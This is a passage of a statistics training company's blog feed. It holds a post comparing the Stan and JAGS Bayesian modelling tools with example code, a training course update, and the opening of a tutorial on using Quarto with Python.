&lt;aside class="advert"&gt;
&lt;p&gt;
Whether you want to start from scratch, or improve your skills, &lt;a href="https://www.jumpingrivers.com/training/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2023-why-stan"&gt;Jumping Rivers has a training course for you&lt;/a&gt;.
&lt;/p&gt;
&lt;/aside&gt;
&lt;h3 id="differences-at-a-glance"&gt;Differences at a glance&lt;/h3&gt;
&lt;p&gt;Stan is a free, open source PPL based on C++. It was developed to allow us to conduct Bayesian inference without the need to write bespoke sampling algorithms. Stan is named after &lt;em&gt;Stanislaw Ulam&lt;/em&gt;, who helped develop the first MCMC methods in the 1940s. Andrew Gelman, one of the lead Stan developers, thinks that in hindsight, &lt;a href="https://www.nytimes.com/2021/02/09/science/arianna-wright-dead.html" rel="external"&gt;&lt;em&gt;Arianna&lt;/em&gt; would have been a better name&lt;/a&gt; than Stan, as it was Arianna Rosenbluth who &lt;em&gt;programmed&lt;/em&gt; the first MCMC algorithm. A basic Stan program for linear regression looks like this:&lt;/p&gt;
&lt;pre tabindex="0"&gt;&lt;code class="language-stan" data-lang="stan"&gt;// A linear regression in Stan
data {
int N; // sample size
vector[N] y; // response variable
vector[N] x; // predictor variable
}
parameters {
real alpha; // intercept
real beta; // slope
real&amp;lt;lower=0&amp;gt; tau; // precision
}
model {
// likelihood
y ~ normal(alpha + beta * x, 1 / sqrt(tau));
// prior
alpha ~ normal(0, 1);
beta ~ normal(0, 1);
tau ~ gamma(2, 2);
}
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;Stan might feel intimidating if you&amp;rsquo;ve never used a statically typed language (such as C++ or Java) before. Statically typed means we must declare the type of every variable in Stan. For example, our sample size, &lt;code&gt;N&lt;/code&gt;, is of type &lt;code&gt;int&lt;/code&gt;: it is an integer. If we try to set &lt;code&gt;N = 12.5&lt;/code&gt; the Stan program will not run! R programmers like myself often take types for granted, especially numerical types.&lt;/p&gt;
&lt;p&gt;Similarly, JAGS is free, written in C++, and allows us to perform Bayesian computation without knowing too much about MCMC schemes. JAGS is an acronym for &amp;ldquo;Just Another Gibbs Sampler&amp;rdquo;; we&amp;rsquo;ll expand on this a bit later. A simple linear regression in JAGS might look like:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## A linear regression in JAGS&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;model {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;# likelihood&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;for&lt;/span&gt; (i &lt;span style="color:#ff7b72"&gt;in&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt;N) {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; y[i] &lt;span style="color:#ff7b72;font-weight:bold"&gt;~&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;dnorm&lt;/span&gt;(alpha &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt; beta &lt;span style="color:#ff7b72;font-weight:bold"&gt;*&lt;/span&gt; x[i], tau)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; }
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;# prior&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; alpha &lt;span style="color:#ff7b72;font-weight:bold"&gt;~&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;dnorm&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;0&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;) &lt;span style="color:#8b949e;font-style:italic"&gt;# intercept&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; beta &lt;span style="color:#ff7b72;font-weight:bold"&gt;~&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;dnorm&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;0&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;) &lt;span style="color:#8b949e;font-style:italic"&gt;# slope&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; tau &lt;span style="color:#ff7b72;font-weight:bold"&gt;~&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;dgamma&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;2&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;2&lt;/span&gt;) &lt;span style="color:#8b949e;font-style:italic"&gt;# residual precision&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;One difference between the two pieces of software is that a Stan program is broken into &amp;ldquo;blocks&amp;rdquo;, which allow the user to tell Stan what all the different variables in the code represent. A Stan program can also contain further optional blocks. Conversely, the JAGS model is usually just one block. JAGS will work out for itself which of the included variables are known (data) and which are unknown (parameters) based on what data is passed to the JAGS program. Another difference in the model specification is vectorisation. Stan allows (and encourages) you to &lt;em&gt;vectorise&lt;/em&gt; your code. In Stan, we wrote &lt;code&gt;y ~ normal(alpha + beta * x, 1 / sqrt(tau))&lt;/code&gt;. This is shorthand for a &lt;code&gt;for&lt;/code&gt; loop over &lt;code&gt;y[i] ~ normal(alpha + beta * x[i], 1 / sqrt(tau))&lt;/code&gt;. Vectorising gives us cleaner looking code and can bring computational advantages. Conversely, JAGS code is much more difficult to vectorise, thus we must rely on slow &lt;code&gt;for&lt;/code&gt; loops more often.&lt;/p&gt;
&lt;p&gt;If you&amp;rsquo;ve used R a lot, the JAGS code might evoke some kind of déjà vu. JAGS code is supposed to look a bit like R code. Distributions are specified by &lt;code&gt;d*()&lt;/code&gt;, the types of a variable are interpreted (JAGS figures out if things are real, integer, etc) and we use &lt;code&gt;#&lt;/code&gt; to write comments. With JAGS, the normal distribution is parameterised by the &lt;em&gt;precision&lt;/em&gt; (the reciprocal of the variance) rather than the standard deviation used by R and Stan, but otherwise, if you have a basic understanding of R, you will be pretty good at guessing what JAGS code does.&lt;/p&gt;
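&lt;p&gt;To make the parameterisation difference concrete, here is a minimal R sketch of converting a precision into a standard deviation. The value of &lt;code&gt;tau&lt;/code&gt; is made up purely for illustration.&lt;/p&gt;
&lt;pre tabindex="0"&gt;&lt;code class="language-r" data-lang="r"&gt;# Hypothetical precision value, chosen only for illustration
tau &lt;- 4

# Precision is the reciprocal of the variance, so sd = 1 / sqrt(precision)
sigma &lt;- 1 / sqrt(tau)

# JAGS: dnorm(mu, tau) takes the precision
# R:    dnorm(x, mean, sd) takes the standard deviation
# Stan: normal(mu, sigma) takes the standard deviation
density_at_zero &lt;- dnorm(0, mean = 0, sd = sigma)
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;This is why the Stan program above uses &lt;code&gt;1 / sqrt(tau)&lt;/code&gt; as the scale of the normal distribution, while the JAGS model passes &lt;code&gt;tau&lt;/code&gt; directly.&lt;/p&gt;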
&lt;h3 id="differences-in-user-experience"&gt;Differences in user experience&lt;/h3&gt;
&lt;h4 id="running-your-models"&gt;Running your models&lt;/h4&gt;
&lt;p&gt;JAGS and Stan can be run on their own, via the command line, but we will likely be pre-processing our data in a more general language like R or Python. An interface between our go-to language and our Bayesian modelling software allows our &amp;ldquo;main&amp;rdquo; language to run Stan or JAGS code. For R users, {rstan} provides this functionality for Stan, and {rjags} provides this for JAGS. There are similar interfaces for other languages (e.g. for Python, use PyStan and PyJAGS). These interfaces have a similar feel.&lt;/p&gt;
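&lt;p&gt;As a rough sketch of what this looks like from R, the code below fits the linear regression from earlier with both interfaces. It assumes the two model programs have been saved to files; the file names, the simulated data and the number of chains and iterations are all hypothetical choices made for illustration.&lt;/p&gt;
&lt;pre tabindex="0"&gt;&lt;code class="language-r" data-lang="r"&gt;library(rstan)
library(rjags)

# Simulated data, purely for illustration
set.seed(42)
N &lt;- 100
x &lt;- rnorm(N)
y &lt;- 1 + 2 * x + rnorm(N, sd = 0.5)
model_data &lt;- list(N = N, x = x, y = y)

# Stan: compile the program and sample in one call
# (&#34;linear_regression.stan&#34; is a hypothetical file name)
stan_fit &lt;- stan(file = &#34;linear_regression.stan&#34;, data = model_data,
                 chains = 4, iter = 2000)
print(stan_fit)

# JAGS: build the model, burn in, then draw samples
# (&#34;linear_regression.jags&#34; is a hypothetical file name)
jags_model &lt;- jags.model(file = &#34;linear_regression.jags&#34;, data = model_data,
                         n.chains = 4)
update(jags_model, n.iter = 1000)
jags_samples &lt;- coda.samples(jags_model,
                             variable.names = c(&#34;alpha&#34;, &#34;beta&#34;, &#34;tau&#34;),
                             n.iter = 1000)
summary(jags_samples)
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;In both cases the data is passed as a named list whose names match the variables in the model code.&lt;/p&gt;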
&lt;h4 id="writing-code"&gt;Writing code&lt;/h4&gt;
&lt;p&gt;A big part of coding up a Bayesian model in Bayesian modelling software is, well, coding up the model.&lt;/p&gt;
&lt;p&gt;One thing I really like about Stan is the &lt;code&gt;functions&lt;/code&gt; block. Good coding practice tells us we should put commonly used blocks of code into a function. This could be handy if we want to fit a non-linear regression model. In Stan, if we wanted to use the expression \( \alpha + e^ {\beta x}\) many times we could define this as a function:&lt;/p&gt;
&lt;pre tabindex="0"&gt;&lt;code class="language-stan" data-lang="stan"&gt;functions {
real non_linear_mean(real alpha, real beta, real x) {
return alpha + exp(beta * x);
}
}
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;This function can be used just like any inbuilt Stan function. JAGS does not have friendly support for user-defined functions or distributions; essentially you need to write your own JAGS module in C++.&lt;/p&gt;
&lt;p&gt;Another thing I like about Stan is that syntax highlighting is supported in many popular editors and IDEs. RStudio has out-of-the-box support for Stan, whilst other popular tools such as Vim and Jupyter have Stan plug-ins. This is because Stan is a &lt;em&gt;language&lt;/em&gt;. As far as I can tell, the only editor that supports JAGS syntax is Emacs (and that&amp;rsquo;s not even out of the box). The lack of support is probably because JAGS is a &lt;em&gt;program&lt;/em&gt; and not a language. Personally, I&amp;rsquo;d find a full data science workflow in Emacs less than ideal. For this post, I used R syntax highlighting on the JAGS code. However, we normally write JAGS code within a string, so the entire model would be highlighted as a string. Stan syntax highlighting is supported by more user-friendly environments and is even supported by &lt;a href="https://quarto.org/" rel="external"&gt;Quarto&lt;/a&gt;, which is handy if you&amp;rsquo;re teaching Bayesian modelling!&lt;/p&gt;
&lt;h4 id="getting-help"&gt;Getting help&lt;/h4&gt;
&lt;p&gt;Reaching out online to get help is a huge part of the user experience. The &lt;a href="https://discourse.mc-stan.org/" rel="external"&gt;Stan Forums&lt;/a&gt; are a hive of activity with questions regularly being answered by the Stan development team themselves. As far as I can tell, the JAGS community does not seem to be as active. Stan even has its own &lt;a href="https://mc-stan.org/events/" rel="external"&gt;conference&lt;/a&gt;!&lt;/p&gt;
&lt;h3 id="differences-under-the-hood"&gt;Differences under the hood&lt;/h3&gt;
&lt;p&gt;This section is a little technical. The TL;DR is: JAGS has a toolbox of relatively simple sampling schemes; under special circumstances some of these schemes are very effective. Stan uses a behemoth of a sampling scheme called Hamiltonian Monte Carlo (HMC). This is a complex sampling scheme but can be very effective for complex models.&lt;/p&gt;
&lt;h4 id="unpacking-the-technical-stuff"&gt;Unpacking the technical stuff&lt;/h4&gt;
&lt;p&gt;JAGS looks at the Bayesian model you have provided and tailors the type of sampling schemes used to maximise performance. When it can be used, JAGS will use a Gibbs sampler. Gibbs is a computationally cheap sampling scheme but can only be used for a small set of likelihood-prior combinations. When JAGS can&amp;rsquo;t use simple, tractable sampling methods it uses more general purpose, but often less efficient methods, such as slice sampling.&lt;/p&gt;
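&lt;p&gt;To give a feel for why Gibbs sampling is cheap, here is a minimal hand-written sketch in R for a normal model with unknown mean and precision. It is an illustration of the general technique under assumed semi-conjugate priors, not a description of how JAGS is implemented internally; the data, prior values and variable names are all made up.&lt;/p&gt;
&lt;pre tabindex="0"&gt;&lt;code class="language-r" data-lang="r"&gt;# Model: y[i] ~ N(mu, 1 / tau), mu ~ N(m0, 1 / p0), tau ~ Gamma(a, b)
set.seed(1)
y &lt;- rnorm(50, mean = 2, sd = 0.5)  # simulated data for illustration
n &lt;- length(y)

# Assumed prior hyperparameters
m0 &lt;- 0; p0 &lt;- 1  # prior mean and prior precision for mu
a &lt;- 2; b &lt;- 2    # shape and rate for tau

n_iter &lt;- 5000
mu_draws &lt;- numeric(n_iter)
tau_draws &lt;- numeric(n_iter)
mu &lt;- mean(y)  # starting values
tau &lt;- 1

for (i in seq_len(n_iter)) {
  # mu | tau, y is normal: combine prior and data precisions
  post_prec &lt;- p0 + n * tau
  post_mean &lt;- (p0 * m0 + tau * sum(y)) / post_prec
  mu &lt;- rnorm(1, mean = post_mean, sd = 1 / sqrt(post_prec))

  # tau | mu, y is gamma: update shape and rate
  tau &lt;- rgamma(1, shape = a + n / 2, rate = b + sum((y - mu)^2) / 2)

  mu_draws[i] &lt;- mu
  tau_draws[i] &lt;- tau
}

# Posterior means
mean(mu_draws)
mean(tau_draws)
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;Each iteration only requires a draw from a standard distribution, which is why the scheme is so fast when the model permits it.&lt;/p&gt;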
&lt;p&gt;The HMC algorithms within Stan are inspired by statistical physics. By default Stan uses the No U-Turn Sampler (NUTS), a variant on HMC. NUTS utilises Hamiltonian Dynamics, which relies on the gradient of the log posterior, \( \nabla \log \pi (\theta \mid x) \). This clever mathematics will (hopefully!) produce a statistically efficient MCMC scheme. The downside of employing complex mathematics is that each iteration of the MCMC scheme can be computationally complex. For more on HMC see &lt;a href="https://arxiv.org/pdf/1701.02434.pdf" rel="external"&gt;Michael Betancourt&amp;rsquo;s introduction to HMC&lt;/a&gt;. The power of HMC is that it can produce a statistically efficient MCMC scheme; we may not need to run the MCMC scheme for as many iterations to obtain satisfactory results, thus the overall run time may be less.&lt;/p&gt;
&lt;h3 id="one-sampling-scheme-to-rule-them-all"&gt;One sampling scheme to rule them all?&lt;/h3&gt;
&lt;p&gt;Suppose we wanted to fit a model in Stan where one or more of the unknowns is &lt;em&gt;discrete&lt;/em&gt;. This might be because we have some missing count data, for example. In this instance, \( \nabla \log \pi (\theta \mid x) \) will not exist, and therefore HMC, and thus Stan, cannot be used directly (unless the discrete unknowns can be marginalised out of the model). Algorithms like slice sampling can work in this situation, so JAGS would be an appropriate tool. I also mentioned that JAGS can be fast for simple models. If your Bayesian model exhibits (semi-)conjugacy, JAGS will probably be more efficient as Gibbs sampling can be used.&lt;/p&gt;
&lt;p&gt;If your Bayesian model does not exhibit any conjugacy, Stan will probably be a better option. There are also other scenarios where Stan will probably be better than JAGS. The first is when the model is complex to write down; if your model is complex enough to warrant user-defined functions, I&amp;rsquo;d use Stan.&lt;/p&gt;
&lt;p&gt;Stan also has other functionality that JAGS does not. For example, Stan has an extensive math library. This allows us to solve algebraic equations and differential equations. You can use Stan to solve these types of equations as standalone problems. If you have observed some data about a physical system described by differential equations, you can use Stan&amp;rsquo;s differential equation solvers in a Bayesian framework to conduct uncertainty quantification about the fitted parameters of a differential equation and propagate posterior beliefs into predictions. Pretty cool, right?&lt;/p&gt;
&lt;h3 id="one-sampling-scheme-to-rule-them-all-1"&gt;One sampling scheme to rule them all?&lt;/h3&gt;
&lt;p&gt;I was taught JAGS as an undergraduate student but taught myself Stan as a postgraduate researcher. I think for that reason, it&amp;rsquo;s not entirely fair to compare my learning experiences, but I did find self-teaching Stan to be harder than learning JAGS from a professor. Prior to learning Stan, I had never worked with a statically typed language, which definitely took some getting used to. However, I was keen to learn Stan because my complex models were taking a long time to run in JAGS. I found that, after a lot of teething problems (mostly forgetting to end lines with &lt;code&gt;;&lt;/code&gt;), my Stan implementations of models were much faster than the JAGS equivalents.&lt;/p&gt;
&lt;p&gt;So, which sampling algorithm is best? As with everything in statistics, &lt;em&gt;it depends&lt;/em&gt;. Jorgen Bolstad&amp;rsquo;s &lt;a href="https://www.boelstad.net/post/stan_vs_jags_speed/" rel="external"&gt;blog post&lt;/a&gt; compared the efficiency of JAGS and Stan for a handful of different Bayesian models. The broad summary is that, from an &lt;em&gt;efficiency&lt;/em&gt; perspective, models with conjugacy are better suited to JAGS, whereas non-conjugate models are better suited to Stan. I think from a programming and user-experience perspective, Stan really wins for &lt;em&gt;complex&lt;/em&gt; models.&lt;/p&gt;
&lt;p&gt;From a programming perspective, after getting over the learning curve, Stan is a better environment for developing Bayesian models. For me, this is because Stan has the flexibility for user-defined functions (which can allow us to specify bespoke distributions as well!).&lt;/p&gt;
&lt;p&gt;I can&amp;rsquo;t tell you what&amp;rsquo;s going to be best for your particular circumstances, but as a general rule I&amp;rsquo;d say for simpler models, JAGS is &lt;em&gt;probably&lt;/em&gt; better and for complex models, Stan is &lt;em&gt;probably&lt;/em&gt; better.&lt;/p&gt;
&lt;p&gt;If you do think Stan is the right tool for you, then why not consider attending &lt;a href="https://www.jumpingrivers.com/training/all-courses/" rel="external"&gt;one of our Stan courses&lt;/a&gt;? Our courses are a great hands-on and interactive way of getting up-and-running and fitting models with Stan!&lt;/p&gt;
&lt;script src="https://www.jumpingrivers.com/third-party/stan.js"&gt;&lt;/script&gt; &lt;!-- Stan syntax --&gt;
&lt;script&gt;
document.querySelectorAll('pre code.language-stan').forEach(block =&gt; hljs.highlightBlock(block));
&lt;/script&gt;
&lt;style&gt;
pre {
color:#f8f8f2 !important;
background-color:#272822 !important;
-moz-tab-size:4 !important;
-o-tab-size:4 !important;
tab-size:4 !important;
}
&lt;/style&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/why-stan/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>February Training Update</title><link>https://www.jumpingrivers.com/blog/february-training-update/</link><pubDate>Tue, 07 Feb 2023 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/february-training-update/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/february-training-update/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/february-training-update/featured.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;We have a great selection of online public training courses coming up over the next two months, including a variety of R courses, as well as some more stats-heavy courses on Bayesian Inference! Read on for a taste of what&amp;rsquo;s in store, or head over to our &lt;a href="https://www.jumpingrivers.com/training/public/" rel="external"&gt;training page&lt;/a&gt; for full details and to book!&lt;/p&gt;
&lt;h3 id="bayesian-inference"&gt;Bayesian Inference&lt;/h3&gt;
&lt;p&gt;Our upcoming courses on Bayesian inference take you from an introduction through to implementing models using Stan with R.&lt;/p&gt;
&lt;h4 id="introduction-to-bayesian-inferencehttpswwwjumpingriverscomtrainingcourseintroduction-bayesian-inference-rstan-monte-carlo"&gt;(Introduction to Bayesian Inference)[https://www.jumpingrivers.com/training/course/introduction-bayesian-inference-rstan-monte-carlo/]&lt;/h4&gt;
&lt;p&gt;&lt;strong&gt;Course level: Foundation&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;em&gt;Next course date: 20th February 2023&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;The capturing and quantification of uncertainty is a very important aspect of model-fitting and parameter inference. Bayesian inference represents a fully-probabilistic approach to parameter inference, allowing a practitioner to quantify their uncertainties through probability densities. However, fitting models in a Bayesian framework can be an involved and complicated affair, often necessitating the use of Markov chain Monte Carlo (MCMC) algorithms and their programmatic implementation.&lt;/p&gt;
&lt;h4 id="introduction-to-bayesian-inference-using-rstan"&gt;&lt;a href="https://www.jumpingrivers.com/training/course/introduction-bayesian-inference-rstan-monte-carlo/" rel="external"&gt;Introduction to Bayesian Inference using RStan&lt;/a&gt;&lt;/h4&gt;
&lt;p&gt;&lt;strong&gt;Course level: Intermediate&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;em&gt;Next course date: 20th-23rd February 2023&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;Despite the promise of big data, inferences are often limited by its systematic structure. Only by carefully modelling this structure can we take full advantage of the data. Stan is a platform for facilitating this modelling, providing an expressive modelling language to implement state-of-the-art algorithms, to draw subsequent Bayesian inferences.&lt;/p&gt;
&lt;p&gt;The course will teach participants how to interface with Stan through R!&lt;/p&gt;
&lt;p&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Whether you want to start from scratch, or improve your skills, &lt;a href="https://www.jumpingrivers.com/training/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2023-february-training-update"&gt;Jumping Rivers has a training course for you&lt;/a&gt;.
&lt;/p&gt;
&lt;/aside&gt;
&lt;!-- This is where the ad goes! Just use the name of the shortcode file. --&gt;&lt;/p&gt;
&lt;h3 id="r"&gt;R&lt;/h3&gt;
&lt;p&gt;If you already have the basics of R down, and want to get a bit more adventurous with it, take a look at some of our more advanced R courses for plotting and data wrangling. We also offer a course on R best practices, so you can make sure your code stands up to the tests of time.&lt;/p&gt;
&lt;h4 id="data-visualisation-with-ggplot2"&gt;&lt;a href="https://www.jumpingrivers.com/training/course/r-advanced-graphics-ggplot2-plotly-themes-scaling-faceting/" rel="external"&gt;Data visualisation with ggplot2&lt;/a&gt;&lt;/h4&gt;
&lt;p&gt;&lt;strong&gt;Course level: Intermediate&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;em&gt;Next course date: 6th-7th March 2023&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;Want to learn how to effectively visualise your data in R using the elegant {ggplot2} package? With {ggplot2} it’s easy to customise everything from plot layouts and themes to scales, colours, and more! This course will comprehensively take you through basic plot types such as bar and line charts as well as cover more advanced topics such as interactive graphics with {plotly}.&lt;/p&gt;
&lt;h4 id="r-best-practices"&gt;&lt;a href="https://www.jumpingrivers.com/training/course/r-best-practices/" rel="external"&gt;R Best Practices&lt;/a&gt;&lt;/h4&gt;
&lt;p&gt;&lt;strong&gt;Course level: Intermediate&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;em&gt;Next course date: 20th-21st March 2023&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;So you can write code? Great. But can you write code which is easy to read, simple to maintain, and reproducible? Under the pressure of deadlines even the best of us can fall victim to bad practices. In this course we motivate the importance of good practices, and show how we can make best practices second nature by incorporating them into our normal workflow.&lt;/p&gt;
&lt;h4 id="data-wrangling-in-the-tidyverse"&gt;&lt;a href="https://www.jumpingrivers.com/training/course/data-tidyverse-dplyr-tidyr-lubridate-forcats/" rel="external"&gt;Data Wrangling in the Tidyverse&lt;/a&gt;&lt;/h4&gt;
&lt;p&gt;&lt;strong&gt;Course level: Foundation&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;em&gt;Next course date: 27th-28th March 2023&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;If you work with data, you probably spend a lot of time cleaning it and wrangling it into the correct shape. This course will show you how you can use R to efficiently clean and wrangle your data into a format that’s ready for analysis. You will learn about the Tidyverse, what tidy data really is, and how to practically achieve it with packages such as {dplyr}, {tidyr}, {lubridate} and {forcats}.&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/february-training-update/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Quarto for the Python user</title><link>https://www.jumpingrivers.com/blog/quarto-for-python-users/</link><pubDate>Thu, 02 Feb 2023 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/quarto-for-python-users/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/quarto-for-python-users/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/quarto-for-python-users/featured.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;As data scientists we often need to communicate conclusions drawn from data. Additionally, as more data is collected,
our reports invariably need updating. This is where automated reporting tools such as Quarto come in! In this blog post we will look at how
Quarto allows us to weave together text and Python code to generate reproducible reports.&lt;/p&gt;
&lt;h3 id="what-is-quarto"&gt;What is Quarto?&lt;/h3&gt;
&lt;p&gt;Quarto is a technical publishing system built on Pandoc. By combining code with plain text, it allows you to create reports that can easily be updated
when the data changes. For example, imagine you have to report on the profits of a company each month. With Quarto, you can create your report with any key figures and charts, then with just the click of a button update it each month with new data. You can also create content in a variety of formats, from articles and scientific papers to websites and presentations, in HTML, PDF, MS Word and more.&lt;/p&gt;
&lt;h3 id="how-does-it-work"&gt;How does it work?&lt;/h3&gt;
&lt;p&gt;&lt;img alt="A flow chart of the Quarto rendering workflow: The qmd file is first converted to Markdown, with Jupyter used to interpret the code cells. The Markdown file can then be converted to a variety of formats, including html, docx and pdf, using Pandoc." height="auto" id="h-rh-i-0" src="https://www.jumpingrivers.com/blog/quarto-for-python-users/quarto-diagram.png" width="838"&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;.qmd&lt;/strong&gt;: For Quarto we work in a &lt;code&gt;.qmd&lt;/code&gt; file. This will contain a mix of markdown and code chunks.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Jupyter&lt;/strong&gt;: When the file is rendered with Quarto, the code chunks are interpreted by Jupyter. You can also select
which Jupyter kernel you want to use.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;.md&lt;/strong&gt;: The code and output, as well as the rest of the content, are then converted to plain markdown.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Pandoc&lt;/strong&gt;: The markdown file is converted to a variety of other formats using &lt;a href="https://pandoc.org/" rel="external"&gt;Pandoc&lt;/a&gt;.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;.html/.pdf/.docx&lt;/strong&gt;: A &lt;code&gt;.qmd&lt;/code&gt; file can be rendered in multiple formats without having to change any content.&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
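&lt;p&gt;As a rough illustration of the last step, the sketch below builds one &lt;code&gt;quarto render&lt;/code&gt; command per output format, using the command&amp;rsquo;s &lt;code&gt;--to&lt;/code&gt; option, and runs them from Python. The file name &lt;code&gt;report.qmd&lt;/code&gt; and both helper functions are hypothetical names chosen for this example; treat it as a minimal sketch rather than a recommended workflow.&lt;/p&gt;

```python
import shutil
import subprocess


def build_render_commands(qmd_path, formats):
    """Return one `quarto render` command (as an argument list) per output format."""
    return [["quarto", "render", qmd_path, "--to", fmt] for fmt in formats]


def render_all(qmd_path, formats):
    """Run each command in turn; do nothing if the quarto CLI is not on the PATH."""
    if shutil.which("quarto") is None:
        print("quarto not found on PATH; skipping render")
        return False
    for command in build_render_commands(qmd_path, formats):
        subprocess.run(command, check=True)
    return True


# report.qmd is a hypothetical file name used for illustration
commands = build_render_commands("report.qmd", ["html", "pdf", "docx"])
for command in commands:
    print(" ".join(command))
```

&lt;p&gt;Only the commands are printed here; calling &lt;code&gt;render_all("report.qmd", ["html", "pdf", "docx"])&lt;/code&gt; would actually run them, provided Quarto is installed and the file exists.&lt;/p&gt;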
&lt;h3 id="where-do-i-run-quarto"&gt;Where do I run Quarto?&lt;/h3&gt;
&lt;p&gt;There are a couple of IDEs where you can run Quarto with Python. For this post
we will be focusing on the Quarto extension for VS Code, which offers an
extensive variety of tools for editing your documents. As we will show in an
upcoming post, you can also render Quarto documents directly from Jupyter
notebooks.&lt;/p&gt;
&lt;p&gt;First things first: you will need to &lt;a href="https://quarto.org/docs/get-started/" rel="external"&gt;install Quarto&lt;/a&gt;. From VS Code, you can then find the extension by clicking on &amp;ldquo;Settings&amp;rdquo;, then
&amp;ldquo;Extensions&amp;rdquo;, then typing &amp;ldquo;quarto&amp;rdquo; into the search bar. Select the &amp;ldquo;Quarto&amp;rdquo;
extension, click &amp;ldquo;Install&amp;rdquo; and after a few seconds you&amp;rsquo;ll be good to go!&lt;/p&gt;
&lt;p&gt;A Quarto document is essentially a text file with a .qmd extension. This can be
created in VS Code by clicking on &amp;ldquo;File&amp;rdquo;, then &amp;ldquo;New File&amp;hellip;&amp;rdquo;, then &amp;ldquo;Quarto
Document (qmd)&amp;rdquo;. Clicking the &amp;ldquo;Render&amp;rdquo; button (or using the keyboard shortcut Ctrl+Shift+K) will open a side window with a
live preview that will update as you edit the document:&lt;/p&gt;
&lt;p&gt;&lt;img alt="A screenshot of VS Code: The qmd file contents are displayed on the left, and the rendered document preview is displayed in a side window on the right." height="auto" id="h-rh-i-1" src="https://www.jumpingrivers.com/blog/quarto-for-python-users/vscode_screenshot.png" width="1848"&gt;&lt;/p&gt;
&lt;p&gt;You can also run Quarto via the terminal:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;To preview your document as you edit it:&lt;/li&gt;
